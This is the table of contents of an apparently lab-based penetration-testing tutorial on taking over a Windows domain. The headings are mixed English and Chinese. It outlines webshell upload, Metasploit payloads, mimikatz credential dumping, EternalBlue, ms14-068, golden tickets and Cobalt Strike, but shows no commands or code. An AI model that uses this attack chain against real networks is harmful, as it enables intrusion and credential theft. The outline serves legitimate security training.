Complete Internal Network Domain Penetration
<p align="center" style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:9.3pt;margin-left:0cm;margin-right:1.3pt;margin-top:0cm;text-align:center;"><span style="font-family:宋体;font-size:22.0pt;line-height:107%;">Complete Internal Network Domain Penetration</span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:2.55pt;margin-left:.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:107%;">Project 6: Complete Internal Network Domain Penetration</span>
</p>
<w:sdt sdtdocpart="t" docparttype="Table of Contents" id="696893570">
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21038">1. Environment Overview</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21039">1.1. Internal Network Penetration Environment</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21040">2. Information Gathering</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21041">2.1. masscan Port Scanning</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21042">2.2. nmap OS and Service Version Detection</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21043">3. Security Testing of the Website</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21044">3.1. Binding hosts Entries</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21045">3.2. gobuster Directory and File Scanning</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21046">3.3. svn Source Code Enumeration Vulnerability</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21047">3.4. Downloading the wc.db File</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21048">3.5. thinkphp Log File Disclosure</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21049">3.6. Writing a python Script for the Log Files</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21050">3.7. Discovering the Admin Password Ciphertext</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21051">3.8. Binding hosts Entries to Guess the Admin Backend Subdomain</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21052">3.9. Backend CAPTCHA Logic Flaw</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21053">3.10. Changing the Allowed Upload File Types to Obtain a webshell</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21054">4. Privilege Escalation and Information Gathering with metasploit</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21055">4.1. Generating the Payload</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21056">4.2. Listening for the Callback Session</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21057">4.3. Process Migration with migrate</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21058">4.4. Obtaining Hashes and Plaintext Passwords with mimikatz</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<a href="https://2k8.org/admin/#_Toc21059">5. Cross-Subnet Domain Penetration</a>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21060" style="color:black;text-decoration:none;">5.1. Cross-subnet domain penetration with metasploit</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21061" style="color:black;text-decoration:none;">5.1.1. Confirming the domain environment</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21062" style="color:black;text-decoration:none;">5.1.2. Locating the domain controller</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21063" style="color:black;text-decoration:none;">5.1.3. Domain information gathering</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21064" style="color:black;text-decoration:none;">5.1.4. Terminal settings for garbled output</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21065" style="color:black;text-decoration:none;">5.1.5. Information-gathering commands run from the terminal</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21066" style="color:black;text-decoration:none;">5.1.6. Obtaining information on users who have logged in</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21067" style="color:black;text-decoration:none;">5.1.7. Adding a route to reach the DC domain controller</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21068" style="color:black;text-decoration:none;">5.1.8. Enabling a proxy</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21069" style="color:black;text-decoration:none;">5.1.9. Configuring a proxychains proxy for nmap scanning</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21070" style="color:black;text-decoration:none;">5.1.10. EternalBlue (ms17_010) overflow</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21071" style="color:black;text-decoration:none;">5.1.11. Conditions for ms14-068</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21072" style="color:black;text-decoration:none;">5.1.12. Enabling Remote Desktop</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21073" style="color:black;text-decoration:none;">5.1.13. Privilege escalation to the domain controller with ms14-068</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21074" style="color:black;text-decoration:none;">5.1.14. Obtaining DC domain controller privileges</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21075" style="color:black;text-decoration:none;">5.1.15. Obtaining hashes and plaintext from the DC domain controller</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21076" style="color:black;text-decoration:none;">5.1.16. Dumping all hashes from the domain controller</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21077" style="color:black;text-decoration:none;">5.1.17. Forging a golden ticket</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21078" style="color:black;text-decoration:none;">5.1.18. Obtaining the NTLM hash, SID and RID</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21079" style="color:black;text-decoration:none;">5.1.19. Stealing domain controller super-administrator privileges</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21080" style="color:black;text-decoration:none;">5.1.20. Generating a golden ticket</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21081" style="color:black;text-decoration:none;">5.1.21. Injecting the golden ticket</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21082" style="color:black;text-decoration:none;">5.2. Internal domain penetration with cobaltstrike</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21083" style="color:black;text-decoration:none;">5.2.1. Setting up the teamserver</a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21084"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.2. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">在</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">服务器上执行下载</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">poershell </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">恶意代码</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21084 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">32</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21085"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.3. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">设置间隔时间</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21085 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">33</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21086"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.4. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">hash </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取域内信任主机</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.............................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21086 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">33</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21087"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.5. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">扫描域内主机</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21087 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">34</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21088"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.6. cs </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">里面集合了很多</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">net </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">命令</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21088 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">35</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21089"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.7.cobaltstrike mimikatz web </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">服务获取明密文</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21089 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">36</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21090"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.8. dir </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">访问域控</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc</span><span style="color:black;text-decoration:none;text-underline:none;"><span>....................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21090 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">37</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21091"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.9.cobaltstrike ms14-068 </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">提权到域控</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21091 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">37</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21092"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.10. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控权限</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21092 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">39</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21093"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.11. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">明文哈希</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21093 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">41</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
